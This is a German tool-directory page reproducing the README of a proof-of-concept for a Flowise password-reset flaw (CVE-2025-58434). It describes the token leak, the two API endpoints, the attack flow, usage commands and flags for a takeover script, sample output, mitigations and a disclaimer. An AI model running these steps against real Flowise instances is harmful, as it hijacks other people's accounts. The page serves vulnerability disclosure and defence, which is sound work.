Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-58434-poc | Kitploit
Tools/GitHubGitHub/kartik2005221/cve-2025-58434-poc
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsAuthentifizierungLernen & BildungRed Teaming
GitHubkartik2005221/cve-2025-58434-poc

CVE-2025-58434-poc

Repository anzeigen
1vor 4 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-58434 — Flowise-Kontoübernahme durch Token-Offenlegung

CVE CVSS Python License Disclosure

⚠️ Dieses Repository dient ausschließlich Bildungszwecken und autorisierter Sicherheitsforschung.
Unautorisierte Nutzung gegen Systeme, die dir nicht gehören oder für die du keine ausdrückliche Erlaubnis zum Testen hast, ist illegal.


Inhaltsverzeichnis

  • Überblick
  • Details zur Schwachstelle
  • Angriffsablauf
  • Betroffene Versionen
  • Repository-Struktur
  • Voraussetzungen
  • Installation
  • Verwendung
  • Beispielausgabe
  • Gegenmaßnahmen
  • Offenlegungszeitplan
  • Referenzen
  • Haftungsausschluss

Überblick

Der forgot-password-Endpunkt in Flowise (sowohl cloud-gehostet als auch selbst gehostet) gibt ein gültiges Passwort-Reset-Token (tempToken) direkt im HTTP-Antworttext zurück — ohne E-Mail-Verifizierung oder Authentifizierung.

Das bedeutet, dass ein Angreifer, der die E-Mail-Adresse eines Opfers kennt (oder erraten kann), Folgendes tun kann:

  1. Den forgot-password-Endpunkt aufrufen → das tempToken in der JSON-Antwort erhalten
  2. Mit dem tempToken den reset-password-Endpunkt aufrufen → ein beliebiges neues Passwort setzen
  3. Sich als das Opfer anmelden → vollständige Kontoübernahme (Account Takeover, ATO)

Es sind kein vorheriger Zugriff, keine Benutzerinteraktion und kein E-Mail-Zugriff erforderlich.


Details zur Schwachstelle

Grundursache

Der forgot-password-Handler gibt den vollständigen Benutzerdatensatz — einschließlich des generierten tempToken — direkt in der API-Antwort zurück, anstatt ihn nur an die registrierte E-Mail-Adresse des Benutzers zu senden.

root@kitploit:~
{
  "user": {
    "id": "<uuid>",
    "name": "Victim Name",
    "email": "[email protected]",
    "credential": "<bcrypt-hash>",
    "tempToken": "<LEAKED_TOKEN_HERE>",
    "tokenExpiry": "2025-08-19T13:00:33.834Z",
    "status": "active"
  }
}

Angriffsablauf

root@kitploit:~
Attacker                              Flowise API
   │                                       │
   │  POST /forgot-password {email}        │
   │──────────────────────────────────────►│
   │                                       │  (generates tempToken)
   │◄──────────────────────────────────────│
   │  201 { tempToken: "abc123..." }       │
   │                                       │
   │  POST /reset-password {email,         │
   │         tempToken, newPassword}       │
   │──────────────────────────────────────►│
   │                                       │
   │◄──────────────────────────────────────│
   │  200 OK  (password changed!)          │
   │                                       │
   ✓  Account Takeover Complete

Betroffene Versionen

  • Flowise Cloud (cloud.flowiseai.com) — bestätigt betroffen
  • Alle selbst gehosteten Flowise-Bereitstellungen vor dem Patch

Informationen zu gepatchten Releases findest du im offiziellen Flowise-GitHub-Repository.


Repository-Struktur

root@kitploit:~
CVE-2025-58434/
├── cve_2025_58434_poc.py   # Main PoC script (two-stage ATO)
├── requirements.txt         # Python dependencies
├── README.md                # This file
└── DISCLAIMER.md            # Legal notice (read before use)

Voraussetzungen

  • Python 3.7 oder höher
  • requests-Bibliothek

Installation

root@kitploit:~
# Clone the repository
git clone https://github.com/yourhandle/CVE-2025-58434
cd CVE-2025-58434

# Install dependencies
pip install -r requirements.txt

Verwendung

Hilfebildschirm

root@kitploit:~
python3 cve_2025_58434_poc.py --help

Phase 1 — Token auslesen (Aufklärung)

Bestätige, dass die Instanz verwundbar ist, und rufe das tempToken ab, ohne ein Passwort zurückzusetzen.

root@kitploit:~
python3 cve_2025_58434_poc.py \
  --url https://flowise.example.com \
  --email [email protected]

Phase 2 — Vollständige Kontoübernahme

Verwende das geleakte Token, um das Passwort sofort zurückzusetzen.

root@kitploit:~
python3 cve_2025_58434_poc.py \
  --url https://flowise.example.com \
  --email [email protected] \
  --reset \
  --new-password "MyNewP@ss2025!"

Rohe JSON-Antwort ausgeben

root@kitploit:~
python3 cve_2025_58434_poc.py \
  --url https://flowise.example.com \
  --email [email protected] \
  --json-output

Alle Optionen


Beispielausgabe

root@kitploit:~
  [Step 1] Sending forgot-password request …
  [*] HTTP Status : 201

  ========================================================================
    LEAKED ACCOUNT DATA
  ========================================================================
    User ID       : 3fa1c2d4-xxxx-xxxx-xxxx-xxxxxxxxxxxx
    Name          : Admin User
    Email         : [email protected]
    Credential    : $2b$10$xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
    Status        : active
    tempToken     : eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...
    tokenExpiry   : 2025-08-19T13:00:33.834Z
  ========================================================================

  [+] tempToken obtained  : eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...
  [!] VULNERABLE: The instance leaks password reset tokens unauthenticated!

Gegenmaßnahmen

Wenn du Betreiber einer Flowise-Instanz bist, wende sofort die folgenden Gegenmaßnahmen an:

  1. Gib Reset-Tokens niemals in API-Antworten zurück. Sende das Token ausschließlich an die registrierte E-Mail-Adresse.
  2. Gib eine generische Erfolgsmeldung von forgot-password zurück, unabhängig davon, ob die E-Mail existiert — dies verhindert auch die Kontobestandsermittlung (Account Enumeration).
  3. Erzwinge Token-Einschränkungen:
    • Einmalige Verwendung (nach erstem Gebrauch ungültig machen)
    • Kurze Gültigkeitsdauer (z. B. 15 Minuten)
    • Wo möglich an die anfragende IP / den User-Agent gebunden
  4. Wende den Fix auf alle Bereitstellungsmodelle an — Cloud und selbst gehostet.
  5. Füge Rate-Limiting für den forgot-password-Endpunkt hinzu.
  6. Protokolliere und alarmiere bei ungewöhnlicher Passwort-Reset-Aktivität.
  7. Ziehe MFA für Administrator- und Konten mit hohen Privilegien in Betracht.

Offenlegungszeitplan

DatumEreignis
2025-08-19Schwachstelle entdeckt und gemeldet
TBDBestätigung durch den Hersteller
TBDPatch veröffentlicht
TBDÖffentliche Offenlegung

Referenzen

  • GitHub Advisory GHSA-wgpv-6j63-x5ph
  • NVD — CVE-2025-58434
  • Flowise GitHub Repository
  • CWE-640: Schwacher Mechanismus zur Passwortwiederherstellung

Haftungsausschluss

Dieses Projekt dient ausschließlich Bildungszwecken und autorisierten Penetrationstests.

  • Führe dieses Tool NICHT gegen ein System aus, ohne ausdrückliche schriftliche Genehmigung des Systeminhabers.
  • Die Autoren dieses Repositorys übernehmen keinerlei Verantwortung für Missbrauch, Schäden oder rechtliche Konsequenzen, die aus unbefugter Nutzung entstehen.
  • Den vollständigen rechtlichen Hinweis findest du in DISCLAIMER.md.
Tool herunterladen
FeldWert
CVE IDCVE-2025-58434
CVSS-Score9.8 (Kritisch)
CVSS-VektorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWECWE-640: Schwacher Mechanismus zur Passwortwiederherstellung
TypAuthentifizierungsumgehung / Unsichere direkte Objektreferenz
Betroffene AppFlowise (Cloud + selbst gehostet)
Endpunkt 1POST /api/v1/account/forgot-password
Endpunkt 2POST /api/v1/account/reset-password
FlagKurzBeschreibungStandard
--url URL-uBasis-URL der Flowise-Instanz(erforderlich)
--email EMAIL-eE-Mail-Adresse des Zielkontos(erforderlich)
--reset-rPhase 2 ausführen: Passwort mit geleaktem Token zurücksetzenFalse
--new-password PASS-pNeues zu setzendes Passwort (wird mit --reset verwendet)Changeme@2025!
--timeout SECONDS-tHTTP-Request-Timeout10
--json-output-jRoh-JSON-Antwort auf stdout ausgebenFalse